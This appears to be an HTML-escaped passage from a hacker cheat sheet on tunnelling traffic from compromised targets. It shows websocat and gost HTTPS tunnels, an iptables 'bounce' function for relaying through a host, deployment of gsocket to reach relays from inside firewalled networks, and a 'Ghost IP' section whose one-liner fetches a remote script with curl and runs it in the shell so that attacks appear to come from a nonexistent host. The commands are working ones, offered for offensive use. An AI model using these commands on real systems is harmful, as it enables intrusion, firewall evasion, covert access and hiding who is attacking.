                                  A. A simple STDIN\/STDOUT pipe via HTTPS:<\/p>\n
                                  ### On the server convert WebSocket to raw TCP:\nwebsocat -s 8080<\/code><\/pre>\n
                                  ### On the remote target forward stdin\/stdout to WebSocket:\nwebsocat wss:\/\/<HTTPS-URL><\/code><\/pre>\n
                                  B. Forward raw TCP via HTTPS:<\/p>\n
                                  ### On the server: Gost will translate any HTTP-websocket request to a TCP socks5 request:\ngost -L mws:\/\/:8080<\/code><\/pre>\n
                                  Forward port 2222 to the server’s port 22.<\/p>\n
                                  ### On the workstation:\ngost -L tcp:\/\/:2222\/127.0.0.1:22 -F 'mwss:\/\/<HTTPS-URL>:443'\n### Test the connection (will connect to localhost:22 on the server)\nnc -vn 127.0.0.1 2222<\/code><\/pre>\n
                                  or use the server as a Socks-Proxy EXIT node (e.g. access any host inside the server’s network or even the Internet via the server (using the HTTPS reverse tunnel from above):<\/p>\n
                                  ### On the workstation:\ngost -L :1080 -F 'mwss:\/\/<HTTPS-URL>:443'\n### Test the Socks-proxy:\ncurl -x socks5h:\/\/0 ipinfo.io<\/code><\/pre>\n
                                  More: https:\/\/github.com\/twelvesec\/port-forwarding<\/a> and Tunnel via Cloudflare to any TCP Service<\/a> and Awesome Tunneling<\/a>.<\/p>\n
                                  \n
                                  <\/a>\n3.iii.c Bouncing traffic with iptables<\/strong><\/p>\n
                                  Bounce through a host\/router without needing to run a userland proxy or forwarder:<\/p>\n
                                  bounceinit() {\n    echo 1 >\/proc\/sys\/net\/ipv4\/ip_forward\n    echo 1 >\/proc\/sys\/net\/ipv4\/conf\/all\/route_localnet\n    [ $# -le 0 ] && set -- "0.0.0.0\/0"\n    while [ $# -gt 0 ]; do\n        iptables -t mangle -I PREROUTING -s "${1}" -p tcp -m addrtype --dst-type LOCAL -m conntrack ! --ctstate ESTABLISHED -j MARK --set-mark 1188 \n        shift 1\n    done\n    iptables -t mangle -D PREROUTING -j CONNMARK --restore-mark >\/dev\/null 2>\/dev\/null\n    iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark\n    iptables -I FORWARD -m mark --mark 1188 -j ACCEPT\n    iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE\n    iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark\n}\nbounce() {\n    iptables -t nat -A PREROUTING -p tcp --dport "${1:?}" -m mark --mark 1188 -j DNAT --to ${2:?}:${3:?}\n}\nbounceinit                             # Allow EVERY IP to bounce\n# bounceinit "1.2.3.4\/16" "6.6.0.0\/16" # Only allow these SOURCE IP's to bounce<\/code><\/pre>\n
                                  (See Hackshell<\/a> bounce<\/code>)<\/p>\n
                                  Then set forwards like so:<\/p>\n
                                  bounce 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port.\nbounce 31338 127.0.0.1 8080   # Bounce 31338 to the server's 8080 (localhost)\nbounce 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443<\/code><\/pre>\n
                                  We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks.<\/p>\n
                                  # Deploy on a target that can only reach 192.168.0.100  \nGS_HOST=192.168.0.100 GS_PORT=53 .\/deploy.sh  <\/code><\/pre>\n
                                  # Access the target  \nGS_HOST=213.171.212.212 gs-netcat -i -s ...<\/code><\/pre>\n
                                  \n
                                  <\/a>\n3.vi.c Ghost IP \/ IP Spoofing<\/strong><\/p>\n
                                  Useful on a host inside the target network. This tool re-configured (without trace) the SHELL: Any program (nmap, cme, …) started from this SHELL will use a fake IP. All your attacks will originate from a host that does not exist.<\/p>\n
                                  source <(curl -fsSL https:\/\/github.com\/hackerschoice\/thc-tips-tricks-hacks-cheat-sheet\/raw\/master\/tools\/ghostip.sh)<\/code><\/pre>\n
                                  This also works in combination with:<\/p>\n